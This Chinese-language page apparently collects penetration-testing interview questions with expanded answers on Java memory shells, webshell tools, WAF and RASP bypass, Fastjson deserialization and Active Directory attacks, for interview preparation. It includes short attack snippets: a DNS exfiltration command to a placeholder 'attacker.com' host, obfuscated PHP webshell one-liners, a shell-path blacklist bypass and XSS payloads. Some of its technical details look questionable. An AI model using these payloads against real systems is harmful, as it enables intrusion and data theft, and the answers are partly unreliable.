2025年渗透测试面试题总结- 某四字大厂面试复盘扩展 一面(题目+回答)

news2025/7/10 3:42:45

网络安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。

目录

 某四字大厂面试复盘扩展 一面

一、Java内存马原理与查杀

二、冰蝎与哥斯拉原理对比(技术演进)

三、WAF绕过实战技巧(多漏洞视角)

四、Webshell免杀技术(多语言实践)

五、Fastjson反序列化漏洞(全链条解析)

六、红黑树与HashMap原理(数据结构深度)

七、内网渗透与域控攻防(实战进阶)

八、RASP原理与对抗(运行时防护)

九、PHP与Golang安全问题(语言特性缺陷)

 某四字大厂面试复盘扩展 一面

java内存马的原理和利用
如何查杀javan内存马,分别从工具和原理角度说说
冰蝎和哥斯拉了解吗,讲讲原理
有绕waf的实战经验吗,从各种漏洞的角度讲下
熟悉webshell免杀吗,讲下原理
做过其他免杀吗,比如结合cs和msfvenom的
谈谈fastjson反序列化原理和常见利用链吧
红黑树原理
hashmap原理
内网渗透、域控相关的实战经验
java反序列化cc链实战原理
sqlmap原理
Mysql为什么要用b+树
linux内核的漏洞
python的沙箱逃逸
python的flask模板注入
抽象语法树
rasp的概念和原理
rasp的对抗
php和golang语法本身的安全问题

一、Java内存马原理与查杀

  1. 内存驻留机制与动态注入
    • 核心原理:利用Java反射机制动态注册Filter/Servlet,或通过Instrumentation API修改已加载类的字节码(如java.lang.instrument )。
    • 实战案例:Tomcat中通过ApplicationFilterChain插入恶意Filter,拦截所有请求,内存中无文件落地。
    • 绕过检测:使用Unicode类名或动态生成类名(如$Proxy123)规避静态特征扫描。
    • 查杀工具
      • Java-memshell-scanner:基于YARA规则扫描JVM进程内存。
      • BTrace脚本:监控ClassLoader.defineClass 等敏感API调用。
    • 防御策略:启用SecurityManager限制敏感操作,配置RASP拦截动态类加载。
  2. 内存马类型细分
    • Agent型:通过-javaagent参数植入,绕过Web容器限制。
    • JSP型:利用JSP动态编译特性(如org.apache.jasper.servlet.JspServlet )。
    • Spring型:通过Controller注解或动态注册Bean注入恶意逻辑。
  3. 高级查杀技术
    • 堆内存分析:使用Eclipse MAT搜索javax.servlet.Filter 实现类,对比容器默认配置。
    • 流量行为检测:监控异常HTTP响应(如固定AES密钥传输、长连接维持)。

二、冰蝎与哥斯拉原理对比(技术演进)

  1. 加密与协议层对抗
    • 冰蝎4.0:引入TLS双向认证,模拟合法HTTPS流量;支持WebSocket协议穿透代理。
    • 哥斯拉3.0:采用分片传输+HTTPS心跳包伪装,绕过基于流量大小的检测规则。
  2. 内存免杀技术
    • 冰蝎:通过JNI调用Native代码执行命令,绕过Java层监控。
    • 哥斯拉:利用PHP的FFI扩展直接调用系统函数,规避system/exec关键字检测。
  3. 检测与溯源方案
    • 流量特征:冰蝎默认User-Agent为Java/1.8,哥斯拉PHP版本含@eval($_POST[1]);特征。
    • 日志分析:检查非常规文件访问(如.jsp访问.ico资源)。

三、WAF绕过实战技巧(多漏洞视角)

  1. SQL注入绕过
    • 分块传输:利用Transfer-Encoding: chunked拆分UNION SELECT为多个数据包。
    • 空白符填充SEL/*!88888EC*/T 1绕过正则表达式检测。
    • 字符集混淆:使用GBK宽字节注入(如%df%27转义单引号)。
  2. RCE绕过
    • 无回显利用:通过DNS日志外带数据(如ping $(whoami).attacker.com )。
    • 环境变量拼接/bi${PATH:0:1}n/sh绕过字符串黑名单。
  3. XSS高级技巧
    • HTML5特性:利用<details ontoggle=alert(1)>触发事件。
    • SVG标签<svg><script>alert(1)</script></svg>绕过传统标签过滤。

四、Webshell免杀技术(多语言实践)

  1. Java免杀
    • 反射调用Class.forName("java.lang.Runtime").getMethod("exec", String.class).invoke(null, "cmd")
    • 字节码加密:使用XOR加密Class文件,ClassLoader加载时动态解密。
  2. PHP免杀
    • 回调函数array_map("as"."sert", array($_POST["cmd"]))拼接函数名。
    • 异或加密$_="!%^"^"@*&"; $$_($_POST[1]);生成可变函数名。
  3. .NET免杀
    • 动态编译:通过CodeDomProvider编译内存中的C#代码。
    • CLR Hook:劫持System.IO.File类方法,绕过文件读写检测。

五、Fastjson反序列化漏洞(全链条解析)

  1. 利用链构造
    • JNDI注入链JdbcRowSetImplsetDataSourceName → JNDI lookup触发RCE。
    • TemplatesImpl链:利用_bytecodes字段加载恶意字节码,触发getOutputProperties方法。
  2. 绕过黑名单策略
    • 非公开类利用:如org.apache.ibatis.parsing.PropertyParser 触发EL表达式。
    • AutoCloseable接口:通过close()方法触发恶意逻辑。
  3. 防御方案
    • 启用SafeMode:禁用@type功能,彻底阻断反序列化漏洞。
    • 升级至2.0+版本:重构反序列化机制,默认关闭自动类型解析。

六、红黑树与HashMap原理(数据结构深度)

  1. 红黑树核心规则
    • 节点为红或黑,根节点为黑,叶子节点(NIL)为黑。
    • 红节点的子节点必须为黑,任意路径黑节点数相同。
  2. HashMap优化细节
    • 负载因子:默认0.75,平衡空间与时间效率。
    • 扩容机制:当元素数超过容量*负载因子时,扩容为2倍并重新哈希。
  3. 线程安全问题
    • JDK7死循环:并发扩容导致链表成环(已修复)。
    • ConcurrentHashMap替代:分段锁(JDK7)或CAS+synchronized(JDK8)。

七、内网渗透与域控攻防(实战进阶)

  1. 横向移动技术
    • Pass-the-Hash:利用NTLM哈希直接认证,无需明文密码。
    • DCOM组件滥用:通过MMC20.Application远程执行命令。
  2. 域控攻击链
    • Kerberoasting:破解服务票据(TGS)获取服务账户密码。
    • AD CS攻击:伪造证书链获取域管权限(如ESC1漏洞)。
  3. 防御与检测
    • 监控DCSync操作:配置SACL审计DS-Replication-Get-Changes事件。
    • 限制特权组权限:避免普通用户加入Exchange Windows Permissions组。

八、RASP原理与对抗(运行时防护)

  1. 核心技术
    • Java Agent:通过premain方法注入,Hook敏感API(如ClassLoader)。
    • 动态污点跟踪:标记外部输入数据,跟踪其传播路径(如SQL查询拼接)。
  2. 绕过手段
    • JNI调用:直接调用fork()execve()执行命令,绕过Java层Hook。
    • 内存操作:通过Unsafe类修改RASP自身字节码,使其失效。
  3. 产品对比
    • OpenRASP:开源方案,支持Tomcat、Spring等环境。
    • 商业方案:Imperva、Prevailion提供AI驱动的行为分析。

九、PHP与Golang安全问题(语言特性缺陷)

  1. PHP漏洞场景
    • 反序列化漏洞__wakeup__destruct方法中的危险操作。
    • 文件包含include($_GET["file"])导致任意代码执行。
  2. Golang风险点
    • CGO组件:C语言交互引入的内存溢出风险。
    • 依赖管理:第三方库未经验证可能导致供应链攻击(如恶意go.mod )。
  3. 安全编码建议
    • PHP:禁用eval(),使用htmlspecialchars防御XSS。
    • Golang:启用-race检测竞态条件,避免使用unsafe包。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/2330590.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

批量压缩 jpg/png 等格式照片|批量调整图片的宽高尺寸

图片格式种类非常的多&#xff0c;并且不同的图片由于像素、尺寸不一样&#xff0c;可能占用的空间也会不一样。文件太大会占用较多的磁盘空间&#xff0c;传输及上传系统都非常不方便&#xff0c;可能会收到限制&#xff0c;因此我们经常会碰到需要对图片进行压缩的需求。如何…

【动手学深度学习】卷积神经网络(CNN)入门

【动手学深度学习】卷积神经网络&#xff08;CNN&#xff09;入门 1&#xff0c;卷积神经网络简介2&#xff0c;卷积层2.1&#xff0c;互相关运算原理2.2&#xff0c;互相关运算实现2.3&#xff0c;实现卷积层 3&#xff0c;卷积层的简单应用&#xff1a;边缘检测3.1&#xff0…

在huggingface上制作小demo

在huggingface上制作小demo 今天好兄弟让我帮他搞一个模型&#xff0c;他有小样本的化学数据&#xff0c;想让我根据这些数据训练一个小模型&#xff0c;他想用这个模型预测一些值 最终我简单训练了一个小模型&#xff0c;起初想把这个模型和GUI界面打包成exe发给他&#xff0…

51.评论日记

千万不能再挖了&#xff0c;否则整个华夏文明将被改写。_哔哩哔哩_bilibili 2025年4月7日22:13:42

SpringCloud第二篇:注册中心Eureka

注册中心的意义 注册中心 管理各种服务功能包括服务的注册、发现、熔断、负载、降级等&#xff0c;比如dubbo admin后台的各种功能。 有了注册中心&#xff0c;调用关系的变化&#xff0c;画几个简图来看一下。(了解源码可求求: 1791743380) 服务A调用服务B 有了注册中心之后&a…

ES 参数调优

1、refresh_interval 控制索引刷新的时间间隔。增大这个值可以减少I/O操作&#xff0c;从而提升写入性能&#xff0c;但会延迟新文档的可见性 查看 GET /content_erp_nlp_help_202503191453/_settings?include_defaultstrue 动态修改&#xff1a;refresh_interval 是一个动态…

用claude3.7,不到1天写了一个工具小程序(11个工具6个游戏)

一、功能概览和本文核心 本次开发&#xff0c;不是1天干撸&#xff0c;而是在下班后或早起搞的&#xff0c;总体加和计算了一下&#xff0c;大概1天的时间&#xff08;12个小时&#xff09;&#xff0c;平常下班都是9点的衰仔&#xff0c;好在还有双休&#xff0c;谢天谢地。 …

【GeoDa使用】空间自相关分析操作

使用 GeoDa 软件进行空间自相关分析 双击打开 GeoDa 软件 选择 .shp 文件 导入文件 空间权重矩阵&#xff08;*.gal / *.gwt&#xff09;是进行任何空间分析的前提 构建空间权重矩阵 空间权重矩阵&#xff08;Spatial Weights Matrix&#xff09; 是一个用来描述空间对象之间…

C++基于rapidjson的Json与结构体互相转换

简介 使用rapidjson库进行封装&#xff0c;实现了使用C对结构体数据和json字符串进行互相转换的功能。最短只需要使用两行代码即可无痛完成结构体数据转换为Json字符串。 支持std::string、数组、POD数据&#xff08;int,float,double等&#xff09;、std::vector、嵌套结构体…

OpenStack Yoga版安装笔记(十七)安全组笔记

一、安全组与iptables的关系 OpenStack的安全组&#xff08;Security Group&#xff09;默认是通过Linux的iptables实现的。以下是其主要实现原理和机制&#xff1a; 安全组与iptables的关系 OpenStack的安全组规则通过iptables的规则链实现。每条安全组规则会被转换为相应的i…

通义万相2.1 图生视频:为AI绘梦插上翅膀,开启ALGC算力领域新纪元

通义万相2.1图生视频大模型 通义万相2.1图生视频技术架构万相2.1的功能特点性能优势与其他工具的集成方案 蓝耘平台部署万相2.1核心目标典型应用场景未来发展方向 通义万相2.1ALGC实战应用操作说明功能测试 为什么选择蓝耘智算蓝耘智算平台的优势如何通过API调用万相2.1 写在最…

52.个人健康管理系统小程序(基于springbootvue)

目录 1.系统的受众说明 2.开发环境与技术 2.1 MYSQL数据库 2.2 Java语言 2.3 微信小程序技术 2.4 SpringBoot框架 2.5 B/S架构 2.6 Tomcat 介绍 2.7 HTML简介 2.8 MyEclipse开发工具 3.系统分析 3.1 可行性分析 3.1.1 技术可行性 3.1.2 经济可行性 3.1.3 操作…

学习比较JVM篇(六):解读GC日志

一、前言 在之前的文章中&#xff0c;我们对JVM的结构、垃圾回收算法、垃圾回收器做了一些列的讲解&#xff0c;同时也使用了JVM自带的命令行工具进行了实际操作。今天我们继续讲解JVM。 我们学习JVM的目的是为了了解JVM&#xff0c;然后优化对应的参数。那么如何了解JVM运行…

I²S协议概述与信号线说明

IIS协议概述 ​ IS&#xff08;Inter-IC Sound&#xff09;协议&#xff0c;又称 IIS&#xff08;Inter-IC Sound&#xff09;&#xff0c;是一种专门用于数字音频数据传输的串行总线标准&#xff0c;由飞利浦&#xff08;Philips&#xff09;公司提出。该协议通常用于微控制器…

免费Deepseek-v3接口实现Browser-Use Web UI:浏览器自动化本地模拟抓取数据实录

源码 https://github.com/browser-use/web-ui 我们按照官方教程&#xff0c;修订几个环节&#xff0c;更快地部署 步骤 1&#xff1a;克隆存储库 git clone https://github.com/browser-use/web-ui.git cd web-ui Step 2: Set Up Python Environment 第 2 步&#xff1a;设置…

[蓝桥杯] 求和

题目链接 P8772 [蓝桥杯 2022 省 A] 求和 - 洛谷 题目理解 这道题就是公式题&#xff0c;我们模拟出公式后&#xff0c;输出最终结果即可。 本题不难&#xff0c;相信很多同学第一次见到这道题都是直接暴力解题。 两个for循环&#xff0c;测试样例&#xff0c;直接拿下。 #in…

通过Ollama本地部署DeepSeek R1模型(Windows版)

嗨&#xff0c;大家好&#xff0c;我是心海 以下是一份详细的Windows系统下通过Ollama本地部署DeepSeek R1模型的教程&#xff0c;内容简洁易懂&#xff0c;适合新手用户参考 本地部署大模型&#xff0c;就有点像在你自己的电脑或者服务器上&#xff0c;安装并运行这样一个“私…

【C++】vector的底层封装和实现

目录 目录前言基本框架迭代器容量第一个测试&#xff0c;野指针异常第二轮测试&#xff0c;浅拷贝的问题 元素访问修改操作push_backinsert迭代器失效问题 erase 默认成员函数构造函数双重构造引发调用歧义 拷贝构造赋值重载析构函数 源码end 目录 前言 废话不多说&#xff0…

Open CASCADE学习|读取点集拟合样条曲线(续)

问题 上一篇文章已经实现了样条曲线拟合&#xff0c;但是仍存在问题&#xff0c;Tolerance过大拟合成直线了&#xff0c;Tolerance过大头尾波浪形。 正确改进方案 1️⃣ 核心参数优化 通过调整以下参数控制曲线平滑度&#xff1a; Standard_Integer DegMin 3; // 最低阶…

【Django】教程-11-ajax弹窗实现增删改查

【Django】教程-1-安装创建项目目录结构介绍 【Django】教程-2-前端-目录结构介绍 【Django】教程-3-数据库相关介绍 【Django】教程-4-一个增删改查的Demo 【Django】教程-5-ModelForm增删改查规则校验【正则钩子函数】 【Django】教程-6-搜索框-条件查询前后端 【Django】教程…